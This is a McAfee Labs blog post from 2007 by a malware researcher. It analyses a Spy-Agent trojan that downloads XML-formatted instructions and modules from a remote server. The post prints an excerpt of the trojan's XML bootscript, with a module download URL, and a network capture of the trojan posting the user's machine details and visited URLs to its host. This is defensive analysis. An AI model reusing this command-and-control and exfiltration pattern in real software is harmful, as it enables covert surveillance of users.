About Me

Pedro Bueno

Pedro Bueno
Security and Malware Researcher
Pedro Bueno is a Security and Malware Researcher at McAfee Labs for almost 5 years. He also has a volunteer job at the SANS ...

Read More

Feeds & Podcasts

Blogs

Meet the Bloggers

Archive

Tags

#SecChat $1 million guarantee 12 Scams of Christmas access to live fraud resolution agents Acquisition Alex Thurber Android antivirus Apple botnet Channel Partners cloud security Compliance Consumer counter identity theft credit card fraud and protection credit fraud alerts credit monitoring credit monitoring and resolution critical infrastructure Cyber Security Mom cyberbullying Cybercrime cybermom data breach data center data center security Data Protection Dave DeWalt DLP Email & Web Security embedded encryption Endpoint Protection enterprise facebook fake anti-virus software Family Safety Friday Security Highlights global threat intelligence google government Hacktivism how to talk to kids how to talk to teens identity fraud identity fraud scams identity protection identity protection $1 million guarantee identity protection fraud identity protection surveillance identity surveillance identity theft identity theft expert identity theft fraud identity theft protection identity theft protection product Identity thieves and cybercriminals intel iphone kids online behavior lost wallet protection malware McAfee McAfee Channel McAfee Family Protection McAfee Identity Protection McAfee Initiative to Fight Cybercrime McAfee Labs McAfee security products Mid-Market Mobile mobile malware mobile security monitor credit and personal information Network Security online personal data protection online safety Operation Aurora PCI personal identity theft fraud personal information loss personal information protection phishing privacy proactive identity protection proactive identity surveillance Public Sector restore credit and personal identity Risk and Compliance scam scams scareware security smartphones social media social networking social networks spam Stuxnet twitter vulnerability Web 2.0 work with victim restore identity

McAfee Labs :

XML Controlled Trojans

Tuesday, June 12, 2007 at 9:23pm by Pedro Bueno
Pedro Bueno

I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan will first communicate with a remote site, and download packages with instructions on how to behave on the machine. The instructions are XML formatted, like the following excerpt:

<?xml version=”1.0″ encoding=”utf-8″ ?>
<bootscript name=”CoreApp::UrlMonitor” version=”100″>
    <downloads>
        <download service_name=”CoreApp::UrlMonitor”>
            <dll url=”http://www.[REMOVED]/UrlMonitor.100.z.img” service_version=”100″ service_exported_as=”UrlMonitor_Message_Handler” deleteable=”" default=”true” />
        </download>
    </downloads>
    <services>
        <service service_name=”CoreApp::UrlMonitor”>
           <parameters>
              <tn:data bytes=”0″>
                 <parameters>
                    <parameter name=”browsers”>
                       <browser name=”IExplore” sname=”IEXPLORE_SERVER” />
                       <browser name=”Firefox” sname=”"  />
                       <browser name=”Opera” sname=”"  />
                       <browser name=”NSShell” sname=”"  />
                       <browser name=”Netscape6″ sname=”"  />
                       <browser name=”Netscape Browser” sname=”"  />
                       <browser name=”Mozilla” sname=”"  />

This file, was named URLMonitor, and also says to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

  • core.101.z.img
  • Notifier.104.z.img
  • URLNotifier.101.z.imo

Several other xml instruction files are downloaded too:

  • bootup.exe.xml
  • UrlMonitor.xml

When active, one action is to watch and report machine information and urls visited by the user. Here’s an excerpt of a WireShark network capture:

POST /cmd?op=post_url_ron HTTP/1.1 Content-Type:
application/x-www-form-urlencoded Accept: */* User-Agent: Internet Explorer
(compatible) Host: http://www.[removed].com/ Content-Length: 582 Connection:
Keep-Alive Cache-Control: no-cache Cookie: AlteonP=xxxxxxxxxxxxxxxxx  <?xml version=”1.0″encoding=”utf-8″?> <url-notifier><user-info><user-ip>192.168.x.x</user-ip>
<user-id>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx</user-id>
<pub-id>XX8</pub-id>
<win-majversion>5</win-majversion>
<win-minversion>1</win-minversion>
<win-regkey>xxxxx-xxx-xxxxxxxx-xxxxx</win-regkey>
<useragent>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; V1)</useragent> <browser-name>iexplore</browser-name>
<browser-version>6.00.2900.2180</browser-version></user-info>
<nids></nids>
<websites><website><name>xx.msn.com</name>
<query-strings></query-strings></website></websites>
</url-notifier>.
HTTP/1.1 200 OK Date: Tue, 12 Jun 2007 xx:xx:xx GMT Server: Apache/1.3.33
(Unix) PHP/4.3.11 mod_perl/1.29 Connection: close Transfer-Encoding: chunked
Content-Type: text/html  66  <?xml version=”1.0″ encoding=”utf-8″ ?> <notification-command>
<!– empty –>
</notification-command>
 0

So, as you can see, very well formatted information, and communication, using XML.

Looks like we are getting into the XML trojans…:)

Bookmark and Share

Submit your own comments / message for this post

Your email is never published nor shared. Required fields are marked *

 

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comments (2)

  • Augusto Paes de Barros June 13, 2007 5:27AM

    Pedro,

    take a look at our Black Hat Europe presentation this year, about botnets trends. We mentioned the use of XML by malware there. Next step, signed XML!

    Reply
  • Andre Fucs June 13, 2007 2:49AM

    This is trend! It was presented at BlackHat europe… :-)

    https://www.blackhat.com/presentations/bh-europe-07/Fucs-Paes-de-Barros-Pereira/Presentation/bh-eu-07-barros.pdf

    Reply